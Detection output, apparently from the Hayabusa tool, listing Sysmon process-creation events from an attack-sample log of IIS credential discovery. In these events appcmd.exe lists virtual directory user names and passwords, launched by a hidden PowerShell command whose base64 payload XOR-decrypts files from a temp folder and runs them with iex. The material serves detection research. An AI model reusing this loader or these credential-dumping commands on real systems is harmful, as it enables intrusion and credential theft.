2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
